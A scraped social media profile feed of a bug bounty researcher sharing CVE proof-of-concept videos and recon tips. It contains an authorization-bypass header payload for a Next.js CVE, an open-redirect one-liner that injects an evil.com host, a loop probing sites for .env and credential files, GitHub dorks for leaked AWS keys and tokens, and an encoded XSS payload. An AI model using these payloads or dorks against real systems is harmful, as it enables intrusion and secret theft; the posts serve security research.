
VAIDIK PANDYA
@h4x0r_fr34k
Escape the ordinary! Building: @tcb_securities 🔲 Explorer 🔲 CyberSecurity Enthusiast🔲 YouTuber Click here👇
قد يعجبك
CVE-2025-59735 : AndSoft e-TMS v25.03 Command Injection

Upcoming CVE & Bug Bounty POC Breakdowns I’ve been working on detailed breakdowns of some new vulnerabilities: CVE-2025-0133 : XSS CVE-2025-53833 : SSTI CVE-2025-30208 : Local File Inclusion All videos will premiere soon on YouTube. 🔗 Watch here: youtube.com/@linuxbyvikku

XSS CVE-2025-4388 Link : youtu.be/_vPLOTHk2jo?si…
youtube.com
YouTube
XSS CVE-2025-4388 | Cross Site Scripting | CVE hunting | Bug Bounty...
CVE-2025-2775 | POC VIDEO youtu.be/Mokx6wbq2JY
youtube.com
YouTube
CVE-2025-2775 | XXE | CVEs hunting | BUG BOUNTY |
Back to Youtube : Starting with this one youtu.be/-4HAq_xOMwI?si…
youtube.com
YouTube
CVE-2025-29927 Next.js Authorisation Bypass | CVEs | Bug Bounty
We need more buddy 🔥
That feeling when your bug bounty finally hits. 🤑 My ramen budget just got a serious upgrade for the month! 💰💸 So grateful for programs that reward security research. 💲💵 #bugbounty #infosec #hacker

CVE-2025-29927 Exploitation : X-Nextjs-Data: 1 X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware



Open Redirects with One-Liners One Liner : cat waybacks.txt | \ sed -E 's#(redirect=|url=|next=|return=|dest=|destination=|continue=|goto=|redirecturl=)[^&]*#\1https://evil.com#gI' | \ httpx -silent -mc 301,302,307,308 -location
![h4x0r_fr34k's tweet image. Open Redirects with One-Liners
One Liner :
cat waybacks.txt | \
sed -E 's#(redirect=|url=|next=|return=|dest=|destination=|continue=|goto=|redirecturl=)[^&]*#\1https://evil.com#gI' | \
httpx -silent -mc 301,302,307,308 -location](https://pbs.twimg.com/media/GypG76eW4AAq-ub.jpg)
One liner for finding files subfinder -d domain.com -silent | \ while read host; do \ for path in /config.js /config.json /app/config.js /settings.json /database.json /firebase.json /.env /.env.production /api_keys.json /credentials.json /secrets.json…

Check this out 👇Just pushed a new repo to GitHub focused on multiple technologies and panels. If you're doing recon, there's a good chance this helps you: Link : github.com/Vaidik-pandya/… post : 4/100
🔍 GitHub Recon: Complete Guide Here’s a list of dorks you can use: Category 1: Credential & Secret Leakage org:"target" "aws_access_key_id" org:"target" "aws_secret_access_key" org:"target" "Authorization: Bearer" org:"target" "slack_token" path:*.json org:"target"…

Post 2/100 CVE-2025-0133 : Payload + Template Payload: %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E Write-up: codewithvamp.medium.com/cve-2025-0133-… Template: github.com/projectdiscove… ---- Check About…




Post 1/100 CVE-2025-2775 : Discovery + Exploitation + Template Shodan Dork : http.title:"SysAid" Fofa Dork : title="SysAid" || body="SysAid Technologies" Exploit: github.com/watchtowrlabs/… Template : drive.google.com/file/d/1ZG1rFR… ---- Check it Out : shorturl.at/9aGVF

Alright, I’ve been off the grid for a while... but I’m back. Will be posting again over X
Nothing fancy. Just focused learning. Sometimes all someone needs is structure. Not a magic tool. Just a clearer path. That’s what these sessions aim to offer — a space to explore real-world bugs, build tools, and understand the "Why" behind each step. This is how the session…

United States الاتجاهات
- 1. Butker 6,413 posts
- 2. Lions 55.7K posts
- 3. Lions 55.7K posts
- 4. Goff 9,496 posts
- 5. Baker 45.7K posts
- 6. #TNABoundForGlory 19.1K posts
- 7. #OnePride 3,987 posts
- 8. Kelce 8,895 posts
- 9. 49ers 41.4K posts
- 10. #SNFonNBC N/A
- 11. #DETvsKC 2,307 posts
- 12. #BNBdip N/A
- 13. Ty Dillon 1,079 posts
- 14. Dan Campbell 1,658 posts
- 15. Bucs 14.2K posts
- 16. Denny 5,352 posts
- 17. Gibbs 4,311 posts
- 18. Packers 36.9K posts
- 19. Stacey 22.7K posts
- 20. Kerby 1,408 posts
قد يعجبك
-
Abdelrhman Amin🇵🇸
@0xUchihamrx -
Shrey
@gfx_shrey -
Saif Abdullah Khan Mahi 🇧🇩
@badhacker0x1 -
encodedguy - jsmon.sh
@3nc0d3dGuY -
Zhenwarx
@zhenwarx -
Samir Gondaliya
@SamirGondaliya6 -
Imamul Mursalin
@d3f7ult -
ReconOne
@ReconOne_bk -
errorsec_
@errorsec_ -
N1T$3C🇳🇵🚩
@Nitesh_patel7 -
M1S0
@UnknownMnz -
Ravindra Lakhara🇮🇳
@RootxRavi -
Ritik Raj 🇮🇳
@Cyber_Ritik -
Saajan Bhujel ❄
@saajanbhujel -
7h3h4ckv157
@7h3h4ckv157
Something went wrong.
Something went wrong.